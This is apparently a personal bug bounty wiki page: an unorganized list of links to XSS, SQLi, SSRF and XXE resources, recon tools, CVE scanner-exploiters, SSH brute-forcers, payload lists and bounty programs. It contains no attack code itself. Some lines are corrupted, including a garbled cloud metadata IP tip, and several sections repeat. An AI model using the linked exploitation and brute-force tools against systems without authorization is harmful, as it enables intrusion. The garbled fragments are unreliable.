https://medium.com/bugbountywriteup/how-i-was-able-to-find-50-cross-site-scripting-xss-security-vulnerabilities-on-bugcrowd-public-ba33db2b0ab1\n  https://github.com/takshal/freq\n  https://bytemeta.vip/index.php/@takshal\n  https://github.com/takshal/freq/pull/2/commits/ca176eee65889530b4896d782419edd0e4325713\n  https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html\n  What is the best method to use dalfox?? https://attacker-codeninja.github.io/2021-09-09-portswigger-notes-on-host-header-attack/\n  https://github.sre.pub/topics/xss-scanners\n  https://medium.com/@skavans_/the-unobvious-about-xss-and-html-encoding-4e0d536a35d9\n  Al the ways you can alert js -&gt; https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309\n  https://github.com/wisec/domxsswiki/wiki\n  https://github.sre.pub/topics/xss-scanners\n  https://owasp.org/www-community/attacks/xss/\n  Moving beyond alert()xss https://av.tib.eu/media/49191\n  https://unescape-room.jobertabma.nl/\n  https://infosecwriteups.com/reflected-xss-on-microsoft-com-subdomains-4bdfc2c716df\n  https://github.com/danielthatcher/Cookieless-Session-Scanner session is for identifying xss as described here   https://blog.isec.pl/all-is-xss-that-comes-to-the-net/\n\nXSS Labs\nhttps://google-gruyere.appspot.com/\n\n\n\nScreenshots\nhttps://github.com/detectify/page-fetch/fork\n\nEyeballer\nhttps://github.com/BishopFox/eyeballer &lt;----- TODO BIG IG and [this](https://www.kaggle.com/datasets/altf42600/pentest-screensots)\nhttps://www.akamai.com/blog#HTTP2rs\nhttps://www.jhaddix.com/post/tooltime-2-ssl-certificate-parsers-for-recon\nRecon\nNotify -bulk - workflow to funnel everything to Notify https://youtu.be/v7FMPU3J3Qw?t=3044\nReconFTW Automation - https://youtu.be/v7FMPU3J3Qw?t=2841\nAutomation - what to do with all the subdomains  endpoints you found! https://youtu.be/v7FMPU3J3Qw?t=1864\n\nTools\nhttps://reconshell.com/awesome-bug-bounty-tools/\nhttps://reconshell.com/mobile-hackers-weapons/\nhttps://book.hacktricks.xyz/todo/more-tools\nhttps://github.com/fardeen-ahmed/Bug-bounty-Writeups#-bug-bounty-tools---\nhttps://github.com/vavkamil/awesome-bugbounty-tools#Recon\nImage upload\nhttps://github.com/barrracud4/image-upload-exploits\nhttps://hackbotone.com/blog/essential-recon-tools/\nhttps://github.com/danielthatcher/spydom\nhttps://allciber.com/web-attack-cheat-sheet/\n\nAlias / Snippet / Command Management\nhttps://github.com/nahamsec/recon_profile\nhttps://github.com/hahwul/hack-pet/commit/6405608c856551d241174d8c839c79efdff5153c\nhttps://github.com/hahwul/hack-pet\nhttps://github.com/knqyf263/pet\n\n\nhttps://github.com/anshumanbh/brutesubs\nhttps://github.com/VainlyStrain/Vailyn\n\nRECON\nhttps://gist.github.com/khanjanny/039d7c7d825a866b9020e3945e04ace9\nhttps://github.com/KathanP19/HowToHunt\nhttps://prettyrecon.com/auth/forgot_password/\n\nTweets Dorks\nhttps://twitter.com/hashtag/bugbountytips\nhttps://twitter.com/search?q=%23bugbountytips&amp;cn=ZmxleGlibGVfcmVjcw%3D%3D&amp;refsrc=email\nhttps://twitter.com/ghostlulz1337\n\nhttps://www.google.com/search?client=firefox-b-1-d&amp;q=site%3Agist.github.com+%22dalfox%22+automate\nhttps://gist.github.com/sec99\nhttps://gist.github.com/Bedrovelsen/starred\nhttps://gist.github.com/tranphuoctien/47c1242c8189b42fb4d268c548db4526\nhttps://gist.github.com/GrahamcOfBorg/601b9608c6010d9c82cf0e9535faac4b\nhttps://gist.github.com/babaloveyou\nhttps://www.google.com/search?client=firefox-b-1-d&amp;q=bug+bountny+automation\nhttps://www.reddit.com/r/bugbounty/comments/nkaz32/automation_for_bug_bounty_recon_framework/\nhttps://github.com/dirsoooo/Recon\nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n\n\nCrawlers / Crawling\nhttps://github.com/Echocipher/HackeroneSpider\nxnLinkFinde\nhttps://github.com/spatie/crawler\nhttp://www.robotstxt.org/\nhttps://github.com/BruceDone/awesome-crawler\nhttps://github.com/tijme/not-your-average-web-crawler\nhttps://github.com/ghostlulzhacks/crawler\nhttps://scotthelme.co.uk/top-1-million-analysis-march-2020/\n\nhttps://crawler.ninja/\n\n  \n\n\nSqli\n  https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61\n  http://sqlninja.sourceforge.net/download.html\n  https://w3af.org/howtos/find-cross-site-scripting-and-sql-injections\n  https://www.securedyou.com/how-to-hack-sql-database-password-cracking/\n  https://www.securedyou.com/download-havij-free-automated-sql-injection-tool/\n\nsqlmap\n  https://h1pmnh.github.io/post/advanced-sqlmap-case-study-1\n\nDefault Credentials \nhttps://github.com/Excloudx6/WebCrack\n  The Open Cloud Vulnerability &amp; Security Issue Database  https://www.cloudvulndb.org/\n  \n  https://github.com/SummitRoute/csp_security_mistakes\n  Default Cred Scanner https://github.com/ztgrace/changeme\n  \n\n  \nFile Upload\nhttps://sm4rty.medium.com/hunting-for-bugs-in-file-upload-feature-c3b364fb01ba\nhttps://github.com/almandin/fuxploider - File upload vulnerability scanner and exploitation tool. \n\n\nMonitor Server Status\nhttps://github.com/sudo-jtcsec/server-status-mon\nhttps://github.com/Excloudx6/server-status_PWN\n\nTmux https://github.com/Excloudx6/clips\n# My Bug Bounty Wiki Page\nhttps://github.com/MrM8BRH/SuperLibrary\nhttps://github.com/zeroc00I/ReconNotes\n   https://gist.github.com/ruevaughn/71c31d7f67b7d105d9f480489e02c906\n\n\nA-Z Sorting in progress\nAwsCli https://aws.plainenglish.io/aws-s3-cli-cheatsheet-9078366fca83\nWelcome to my Bug Bounty Wiki page. It's currently not organized or cleaned up at all though that's a WIP. Originally was where I was dumping links and things I needed to rememnber.\nNews Articles\nhttps://www.bbc.com/news/technology-43581624\n\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1524\n\nDeserialisation\nDeserialization example &lt;-https://youtu.be/oUAeWhW5b8c?t=1583\nAnother Deserialization example https://youtu.be/eDfGpu3iE4Q?t=266\nhttps://github.com/GerbenJavado/LinkFinder\nhttps://medium.com/@duhroach/how-png-works-f1174e3cc7b7\n\n\nhttps://github.com/beurtschipper/Depix &lt;-- unblur \n\n### A\n\nTwitter\nhttps://mobile.twitter.com/drunkrhin0/status/1344130730947825664\n\n\nhttps://kathmandupost.com/science-technology/2021/04/06/we-dream-to-be-nepal-s-first-billion-dollar-it-company\nhttps://reconwithme.com/\n\nhttps://jaeles-project.github.io/\n\nAPIs\nHuge API Resources list! https://dsopas.github.io/MindAPI/references\nhttps://thexssrat.podia.com/view/courses/free-api-testing-and-securing-guide/923506-api-top-10-videos/2699995-owasp-api-top-10-a0-to-a3\n\nhttps://www.hahwul.com/2019/07/01/easy-security-testing-with-applications-bridge-in-zap/\nhttps://github.com/PortSwigger\n\n### B\nBooks https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md\nhttps://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html\nhttps://guidesmiths.github.io/cybersecurity-handbook/resources\nhttps://guidesmiths.github.io/cybersecurity-handbook/tooling\n\n\nhttps://github.com/1N3/Sn1per/blob/master/modes/normal_webporthttp.sh\nBlogs\nhttps://opsecx.com/index.php/category/blog/\n\n\nUrl FInder\nhttps://www.kitploit.com/2021/08/sigurlfind3r-reconnaissance-tool-it.html\n\n403 Bypasser\nhttps://www.kitploit.com/2021/11/4-zero-3-403401-bypass-methods-bash.html\nhttps://www.kitploit.com/2021/09/403bypasser-automates-techniques-used.html\n\nOauth\n#### Oauth Bug Bounty Cheatheet\nhttps://0xn3va.gitbook.io/cheat-sheets/web-application/oauth-2.0-vulnerabilities\nhttps://anil-pace.medium.com/json-web-tokens-vs-oauth-2-0-85dd0b32057d\n\nEmail\nhttps://www.ibm.com/docs/en/sqsp/32.0?topic=SSBRUQ_32.0.0/com.ibm.resilient.doc/install/resilient_install_defang s.htm\n\nNuclei\nNuclei : A Bug Bounty Tool https://www.youtube.com/watch?v=ZcG8ARatgs0\nhttps://www.reddit.com/r/infosec_daily/comments/lrz9bg/nuclei_tool_review/\nFinding bugs with Nuclei with PinkDraconian (Robbe Van Roey) https://www.youtube.com/watch?v=ewP0xVPW-Pk\n\nNuclei templates\nhttps://github.com/xm1k3/cent &lt;-- manage nuclei tempaltes and ibg list of templateseeeeeeeeeeeeeeeeeee\nhttps://github.com/aboul3la/nuclei-templates\nhttps://github.com/projectdiscovery/nuclei-templates/compare/master...s4e-labs:nuclei-templates:master\nhttps://github.com/projectdiscovery/nuclei-templates/discussions/693\nhttps://nuclei-templates.netlify.app/\n\ncool\nhttps://github.com/nikitastupin/param-miner-doc\n\n\nrxrdxrhttps://platforms.disclose.io/\nhttps://cardanofeed.com/cardano-doubled-the-rewards-for-its-bug-bounty-program-49977.html\nhttps://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2022\nhttps://portswigger.net/daily-swig/cloudflare-bug-bounty-program-goes-public-with-3-000-rewards-on-offer\n\n\n### C\n\nFuzzing\nhttps://thugcrowd.com/kiosk/ Badass Fuzzing tools / Resources\nhttps://0xn3va.gitbook.io/cheat-sheets/resources/software/fuzzing\n\nBug Bounty Videos\nMix - webpwnized https://www.youtube.com/watch?v=Y_2JVREtDFk&amp;list=RDCMUCPeJcqbi8v46Adk59plaaXg&amp;start_radio=1\nBreaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! - https://www.youtube.com/watch?v=CIhHpkybYsY&amp;t=2s\nVideos\n  HackTube5 Youtube https://www.youtube.com/channel/UCiiEXWVI8XDV_SbIOYVuKog\n  GynvaelEN https://www.youtube.com/user/GynvaelEN\n  Hacktify https://www.youtube.com/channel/UCS82DNnKOhXHcGKxGzQvNSQ\n  Hack the Box Youtube https://www.youtube.com/channel/UCi67lRCd5qpaHwSXNJisuRQ\n  Hackerone https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw\n  Hackersploit https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q\n  Hacking Simplified https://www.youtube.com/channel/UCARsgS1stRbRgh99E63Q3ng\n  Hacking Simplifed (smaller channel) https://www.youtube.com/channel/UCTIHXPYJ4gT7PBQK9tUmFJA\nhttps://administraitor.video/edition/Hack.lu/2019\n\nhttps://portswigger.net/news\n\nNotify - https://youtu.be/rbr7ZmBI9qs?t=278\n\nhttps://www.youtube.com/watch?v=kbi2KaAzTLg\n\nWhat after Recon? - Sup Subdomains?!\n\n\nDORK\n  https://exposingtheinvisible.org/guides/google-dorking/\nhttps://www.google.com/imgres?imgurl=https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FEf6ELytWAAAswXx%3Fformat%3Djpg%26name%3D4096x4096&amp;imgrefurl=https%3A%2F%2Fmobile.twitter.com%2Fbugbountyrecon&amp;tbnid=pQu57Q5pha2WIM&amp;vet=12ahUKEwixtNqk0vz1AhV0IX0KHWddCpQQMygLegUIARC-AQ..i&amp;docid=NghhHzdXU7Ey8M&amp;w=2480&amp;h=1302&amp;q=Bug%20bounty%20automation%20GitHub&amp;client=firefox-b-1-d&amp;ved=2ahUKEwixtNqk0vz1AhV0IX0KHWddCpQQMygLegUIARC-AQ\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\nReporting\nhttps://hacktify.in/bugbounty/ &lt;---- lots of resources for reporting\n\n\n#### Ruby on Rails\nhttps://hackerone.com/reports/904059\nhttps://hackerone.com/reports/1400309\nhttps://github.com/httpvoid/writeups/blob/main/Ruby-deserialization-gadget-on-rails.md\nhttps://bugbountyforum.com/resources/#ruby-on-rails\n\nFree Shodan key and nmap automatin script to search for big f5 ip acve\nhttps://learn.hacktify.in/courses/take/bug-bounty-hunting-and-penetration-testing/lessons/16862042-assets-resources\nhttps://github.com/shifa123/f5BigIPExploit/blob/master/assets\ndnmap\nhttps://github.com/vdjagilev/nmap-formatter\nhttps://www.darknet.org.uk/2016/07/dnmap-distributed-nmap-framework/?utm_source=pocket-ff-recs\nhttps://github.com/alt3kx/CVE-2021-21985_PoC/blob/main/CVE-2021-21985.nse\n# https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse\n# https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve2020-3452.nse\naquatone - https://gist.github.com/random-robbie/beae1991e9ad139c6168c385d8a31f7d\nhttps://www.tib.eu/en/publishing-archiving/research-data\nhttps://github.com/erbbysam/Hunting-Certificates-And-Servers/blob/master/Hunting%20Certificates%20%26%20Servers.pdf\nBug Bouty Programs\nhttps://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html\nhttps://guidesmiths.github.io/cybersecurity-handbook/resources\nhttps://guidesmiths.github.io/cybersecurity-handbook/tooling\n\n\nrxrdxrhttps://platforms.disclose.io/\nhttps://cardanofeed.com/cardano-doubled-the-rewards-for-its-bug-bounty-program-49977.html\nhttps://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2022\nhttps://portswigger.net/daily-swig/cloudflare-bug-bounty-program-goes-public-with-3-000-rewards-on-offer\n\nhttps://hackerone.com/alipay?type=team\nhttps://render.alipay.com/p/c/183ecyeztvuo/dana-pay.html\n\nDisclosure Assistance w/ Hackerone https://hackerone.com/disclosure-assistance/disclosure_assistance_requests/new?type=team\n* [Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n\nhttps://github.com/detectify/cs-challenge\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\nVDP\nDutch Gov - bug bounty scope https://gist.github.com/ruevaughn/f2d1157598a6156c3d51538b3fbd980c\nhttps://www.justice.gov/criminal-ccips/page/file/983996/download\n\"Bug Bounty programs|VDP|launch\" -&gt; Google News etc\n\n\n\n#### J\n\n\n#### L\n\nLabs\n\nLinux\nhttps://linuxsecurity.expert/resources/\n\n#### M\n\nMonitoring\nhttps://github.com/dgtlmoon/changedetection.io Monitor Website Changes\n\n### P\n\n#### Podcasts\nLinks here -&gt; https://blog.intigriti.com/2019/11/12/bug-bytes-44-new-platform-new-programs-and-a-e25k-head-csrf/\nSelfHosted Podcast https://selfhosted.show/60?t=777\n\nPrograms\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\n### R\n#### \n#### Reverse Shells\n\n### Rate Limit\n\n\n### T\nTop 10\n\nDNS Hijacking\nhttps://www.cloudflare.com/en-ca/learning/security/global-dns-hijacking-threat/\nhttps://github.com/mdsecresearch/Publications/blob/master/presentations/Offensive%20Development%20-%20Post-Exploitation%20Tradecraft%20in%20an%20EDR%20World%20-%20x33fcon%202020.pdf\n\nIDN Homograph\nhttps://www.akamai.com/blog/security/watch-your-step-the-prevalence-of-idn-homograph-attacks\n\n\n#### Tools\nhttps://www.xmind.net/m/Xy7XEW/# &lt;----- \nhttps://github.com/Excloudx6/PentestTools#exploitation-tools\nhttps://linuxsecurity.expert/security-tools/top-100/\nhttps://intelx.io/tools\nhttps://github.com/nccgroup/ScoutSuite/tree/master/tools\nClean Ips Script\nhttps://gist.github.com/LuD1161/bd4ac4377de548990b47b0af8d03dc78\n### D\nhttps://github.com/nccgroup/tracy\n\n#### Todo\nhetty.xyz\nhttps://www.bugbountyhunting.com/\n    \nhttps://github.com/KingOfBugbounty/KingOfBugBountyTips#scan-log4j-using- -and-log4j-scan\nhttps://medium.com/hacking-info-sec/how-to-install-and-use-bbrf-35f6aa15fbc9\n\nhttps://github.com/Excloudx6/Guide-to-SSRF\nhttps://github.com/alphaSeclab/sec-daily-2020\nhttps://github.com/KathanP19/HowToHunt/blob/master/CheckList/mindmap.png\nhttps://github.com/topics/bugbounty\nhttps://gist.github.com/R0X4R/bc08d55e368965f22c0b41ee8475ba87\nSSRF\nhttps://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Big.pdf\nNmap\nhttps://github.com/killswitch-GUI/PenTesting-Scripts/blob/master/Nmap-Strings\nhttps://www.bugcrowd.com/blog/getting-started-bug-bounty-hunter-methodology/\nhttps://github.com/SmeegeSec/Security_Headers_Nmap_Parser\n\nssh bruting\n A simple multi-threaded distributed SSH brute-forcing tool written in Python  https://github.com/k4yt3x/orbitaldump\nhttps://github.com/d3vilbug/Brutal_SSH\n\nxsshunter\nhttps://github.com/mystech7/xsshunter - duplicate within 15 min check added\n\nhttps://gosecure.github.io/security-cheat-sheet/\n\n\nhttps://twitter.com/e11i0t_4lders0n/status/1489234267687497735\nhttps://snyk.io/log4j-vulnerability-resources/\n\n\n\nhttps://gist.github.com/sminez/571bd7bafb1b88630b85c85a0cd66e3a - grep through this\ntry\nhttps://github.com/arjunshibu/gcmd\n\nhttps://splash.readthedocs.io/en/stable/scripting-tutorial.html#scripting-tutorial\nhttps://github.com/phlmox\n\nRecon\n  https://github.com/Viralmaniar/BigBountyRecon\nhttps://www.kitploit.com/2021/10/webdiscover-purpose-of-this-script-is.html\nhttps://www.cobalt.io/blog/scope-based-recon-smart-recon-tactics\n\nChecklists\nhttps://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab\nhttps://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf\nhttps://blog.assetnote.io/2021/01/13/blind-ssrf-chains/\nhttps://gist.github.com/pdelteil/ba005609789ae14862f023da4191826d\nhttps://github.com/rails/rails/issues/37620\nSUBDOMAIN TAKEOVERS\nhttps://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\nhttps://www.udemy.com/course/cloud-hacking/learn/lecture/8613164?start=0#overview\nhttps://github.com/indianajson/can-i-take-over-dns\n\n\nhttps://scotthelme.co.uk/top-1-million-analysis-march-2020/\n\nFINISH Watching - https://www.youtube.com/watch?v=12gtkYbMGd4&amp;t=362s\nHARSHBROTHA - https://www.youtube.com/watch?v=UrdvDCb4Gz8\nNOTIFY - https://www.youtube.com/watch?v=rbr7ZmBI9qs\nHandle your data carefully https://www.y\noutube.com/watch?v=rbr7ZmBI9qs\n\nUserAgents\nhttps://github.com/Shaked/user-agents\nhttps://github.com/BbhunterOne/ReconChef/blob/main/recon.sh#L82\n\nScreenshots\nhttps://github.com/spatie/browsershot\n# https://github.com/maaaaz/webscreenshot\nhttps://random-robbie.github.io/bugbounty-scans/\nhttps://buaq.net/go-99375.html\nhttps://stackoverflow.com/questions/5258977/are-http-headers-case-sensitive?rq=1\n\ncheatsheets\nhttps://0xn3va.gitbook.io/cheat-sheets/\nhttps://0xn3va.gitbook.io/cheat-sheets/web-application/http-request-smuggling\n   _   _   _   _   _   _   _   _   _   _  \n  / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n ( F | R | A | M | E | W | O | R | K | S )\n  \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n\n+ ------ +\n |Articles|\n + ------ +\n\n* E.crack jwt - https://github.com/brendan-rius/c-jwt-cracker\n\nhttps://github.com/SecureAuthCorp/impacket\nNeo4j vs postgres (graphdb)\nhttps://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/\n\nAutomation script \nhttps://www.benteveo.kiwi/blog/automating-bug-bounties\nhttps://github.com/AlexisAhmed/BugBountyToolkit &lt;-- docker \nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n\n\nSecret\nhttps://www.directdefense.com/csrf-in-the-age-of-json/\n\nhttps://buaq.net/go-249.html\n\nIntentionally Vulnerable Github repo\nhttps://github.com/shifa123/githubleak\n\nhttps://wiki.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contentsfff\nhttps://pentestbook.six2dez.com/\nhttps://github.com/m4ll0k\nhttps://github.com/six2dez\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/shifa123\nhttps://www.udemy.com/course/web-application-ethical-hacking/learn/lecture/3305350?start=0#overview\n\n## BugBounty Programs\n---\nhttps://huntr.dev/\nhttps://www.zerodayinitiative.com/\nhttps://greedybucks.medium.com/bug-bounty-programs-beginners-should-try-fe51cebe52a5\nhttps://opensourcelibs.com/lib/google-acquisitions\nhttps://opensourcelibs.com/libs/bugbounty\nList of .gov\n\nTatget crypto https://arlolra.github.io/otr/\nhttps://github.com/cisagov/dotgov-data\n[FireBounty](https://firebounty.com) The Ultimate Vulnerability Disclosure Program. FireBounty, aggregate your bounty.\n[Disclose.io](https://disclose.io/programs/) We're here to make vulnerability disclosure safe, simple, and standardized for everyone.\n[Security Ninja txt valuess list](https://crawler.ninja/files/security-txt-values.txt)\n[Security Ninja Files List](https://crawler.ninja/files/)\n\nhttps://allabouttesting.org/\n\nTodo:\nhttps://boards.greenhouse.io/cobaltio/jobs/4141074002 &lt;--- solve challenge\n\n\nCheatSheets\nhttps://github.com/six2dez/bitup2021_subdominions/blob/main/Cheatsheet.md\n\n\n\n\nAutomated Scanners\n\n* [Zeus-Scanner](https://github.com/Ekultek/Zeus-Scanner)\n* [Dalfox](https://github.com/hahwul/dalfox)\n* [XSSTrike](https://github.com/s0md3v/XSStrike)\n* [SSTI-xssfinder](https://awesomeopensource.com/project/darklotuskdb/SSTI-XSS-Finder?categoryPage=47)\n\n[SSTI-XSS-Finder](https://github.com/darklotuskdb/SSTI-XSS-Finder)\n  * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass OpenRedirects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\n  * https://twitter.com/0xJin/status/1470748925963513863\n  * https://twitter.com/0xJin/status/1470748925963513863/photo/1\n\n\nXXE\nhttps://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity\nhttps://app.intigriti.com/programs/dpgm/libelle/detail\nhttps://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html\nhttps://twitter.com/infosec_au/status/1340785029899698181?lang=en\nhttps://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html\n\nUnderstanding DTD-&lt; https://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html\n\n\n## Owasp Top 10\n---\nhttps://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/WhatsNew.html\n### Clickjacking\nhttps://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html\nhttps://blog.innerht.ml/page/2/\nhttps://hackerone.com/reports/8724\n\n### CSRF\n    * https://hackerone.com/reports/44146\n   - 7-19-16 \n     * [CSRF attack on paypal.me](https://www.youtube.com/watch?v=RjS47ojRQXk&amp;t=5s)\n     * https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/\n   - 01-18-15 https://hackerone.com/reports/44146(Make API calls on behalf of another user (CSRF protection bypass))\n### XSS\n\nPaid Services\nhttps://findomain.app/#Pricing\n\n## Resources\n---\n\n\nParams\nConfig override using non-validated query parameter allows at least reflected XSS by injecting configuration into state \nhttps://hackerone.com/reports/1082847\n\nFuzzcon &amp; fuzzung\nhttps://twitter.com/hashtag/hacklu?src=hashtag_click\nhttps://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Fuzzing.md\n\nRecoon \neiIaaefwaaa m\nk\n- https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n\n[PrettyRecon](https://prettyrecon.com/auth/signup)\n\n### Dorks\nhttps://ask.fm/tags/bounty\n\n### Lists\nhttps://github.com/payloadbox/xss-payload-list\n\nProtips and Trips\nMost of the sites use AWS nowadays...\n  AWS localhost is 169.254.169.2qqqd eede                                   4bs.com/2017/02/wallpaper-penetration-testing-and-exploit-dev-cheatsheet/\n\nhttps://githubhelp.com/topic/bugbountytips\n\n\nGithubs\nhttps://github.com/kleiton0x00?tab=stars\nhttps://github.com/fuzz-security\n\n---\n\n  - [Book of secret knowledge](https://github.com/ruevaughn/the-book-of-secret-knowledge)\n  - [Disclose/diodb](https://github.com/disclose/diodb)\n  -\n\n### Streams\n[Nehamsec Twitch](https://www.twitch.tv/nahamsec)\n\n### Twitter Tweetin'\nhttps://twitter.com/0xMstar/status/1464658472981565444{{\nhttps://twitter.com/0xJin/status/1470748925963513863\n\npodcasts\nhttps://open.spotify.com/episode/2VaH6DgbghMEiaimqdxq4Q\n### Data\n---\nBugcrowd Subdomain Enumeration https://www.youtube.com/watch?v=La3iWKRX-tE\n\n\nCVE-2019-11510 Detail \n/dana-na\n\n## CVE/CVD\n---\n\nCVE [2020-3452](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)xx\n\n- https://vuls.cert.org/confluence/display/CVD/Executive+Summary\n- https://vuls.cert.org/confluence/display/CVD/Sightings\n\n\n\n\n\nhttps://github.com/detectify/cs-challenge\nhttps://github.com/r3curs1v3-pr0xy\n\nhttps://notsosecure.com/resources\nhttps://reconshell.com/bug-bounty-tips/\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md\n[Insecure Deserialization Part 1](https://www.youtube.com/watch?v=SNi7gNkfLSM)\n[Insecure Deserialization part 3](https://www.youtube.com/watch?v=icAKHE-iKOs)\n\nhttps://secoceans.com/blog-2/\nhttps://portswigger.net/research\nhttps://portswigger.net/blog\nhttps://portswigger.net/news\nhttps://portswigger.net/daily-swig\n\n\ncourses\nhttps://www.udemy.com/course/penetration-testing-bug-bounty-hunting-level-2-hacktify/\n\n\n\n\nhttps://spongebhav.medium.com/facebook-group-members-disclosure-e53eb83df39e\nhttps://github.com/six2dez/talks/blob/main/Gotta_ENG.pdf\n\n\n\npackets\nhttps://www.kitploit.com/2018/08/polymorph-real-time-network-packet.html\n\n\nAutomation\nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n[Automated subdomain scanning with Findomain, PostgreSQL and Webhooks](https://medium.com/heck-the-packet/automated-subdomain-scanning-with-findomain-postgresql-and-webhooks-3e74ce9b5372)\n\n\n\nhttps://pentestbook.six2dez.com/\nhttps://github.com/m4ll0k\nhttps://github.com/six2dez\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/shifa123\n\nWriteups\n\n\n## BugBounty Programs\n---\n\nhttps://greedybucks.medium.com/bug-bounty-programs-beginners-should-try-fe51cebe52a5\nhttps://opensourcelibs.com/lib/google-acquisitions\nhttps://opensourcelibs.com/libs/bugbounty\nList of .gov\nhttps://github.com/cisagov/dotgov-data\n[FireBounty](https://firebounty.com) The Ultimate Vulnerability Disclosure Program. FireBounty, aggregate your bounty.\n[Disclose.io](https://disclose.io/programs/) We're here to make vulnerability disclosure safe, simple, and standardized for everyone.\n[Security Ninja txt valuess list](https://crawler.ninja/files/security-txt-values.txt)\n[Security Ninja Files List](https://crawler.ninja/files/)\n\nhttps://allabouttesting.org/\n\n\nCheatSheets\nhttps://github.com/six2dez/bitup2021_subdominions/blob/main/Cheatsheet.md\n\n### Z\n\nZap\nhttps://github.com/sepehrdaddev/zap-scripts/fork\nhttps://www.zaproxy.org/authors/thorin/\nhttps://github.com/zaproxy/zap-extensions\n\n\n\nFrameworks\nhttps://core.intrigue.io/\nReconness\nPwnmachine\naxiom\nhttps://www.mandiant.com/\nhttps://trickest.com/\n\n(https://github.com/Findomain/Findomain/releases)\n*   [Configuing Findomain](https://www.youtube.com/watch?v=Wpm2C1LD9ns)\n*   https://github.com/findomain/findomain/blob/master/README.md#subdomains-monitoring\n\nAutomated Scanners\n\n* [Zeus-Scanner](https://github.com/Ekultek/Zeus-Scanner)\n* [Dalfox](https://github.com/hahwul/dalfox)\n* [XSSTrike](https://github.com/s0md3v/XSStrike)\n* [SSTI-xssfinder](https://awesomeopensource.com/project/darklotuskdb/SSTI-XSS-Finder?categoryPage=47)\n\n\n\nhttps://github.com/darklotuskdb/SSTI-XSS-Finder\n  * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass Op enRed irects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\n  * https://twitter.com/0xJin/status/1470748925963513863\n  * https://twitter.com/0xJin/status/1470748925963513863/photo/1\n\n\n## Owasp Top 10\n---\n\n### Clickjacking\nhttps://hackerone.com/reports/8724\n\n### CSRF\n    * https://hackerone.com/reports/44146\n   - 7-19-16 \n     * [CSRF attack on paypal.me](https://www.youtube.com/watch?v=RjS47ojRQXk&amp;t=5s)\n     * https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/\n   - 01-18-15 https://hackerone.com/reports/44146(Make API calls on behalf of another user (CSRF protection bypass))\n### XSS\n\nPaid Services\nhttps://findomain.app/#Pricing\n\n## Resources\n---\n[Automated subdomain scanning with Findomain, PostgreSQL and Webhooks](https://medium.com/heck-the-packet/automated-subdomain-scanning-with-findomain-postgresql-and-webhooks-3e74ce9b5372)\n How to view someones IP address and connection speed! https://www.youtube.com/watch?v=SXmv8quf_xM\nRecoon \neiIaaefwaaa m\nk\n- https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n\n[PrettyRecon](https://prettyrecon.com/auth/signup)\n\n### Dorks\nhttps://ask.fm/tags/bounty\n\n### Lists\nhttps://github.com/payloadbox/xss-payload-list\n\n### Githubs\n---\n\n  - [Book of secret knowledge](https://github.com/ruevaughn/the-book-of-secret-knowledge)\n  - [Disclose/diodb](https://github.com/disclose/diodb)\n  -\n\nActive Directory\nPenttesting Active Directory https://www.xmind.net/m/5dypm8/a\nhttps://adsecurity.org/\n\n### Streams\n[Nehamsec Twitch](https://www.twitch.tv/nahamsec)\nLive Bug Bounty Hunting Speedbiker 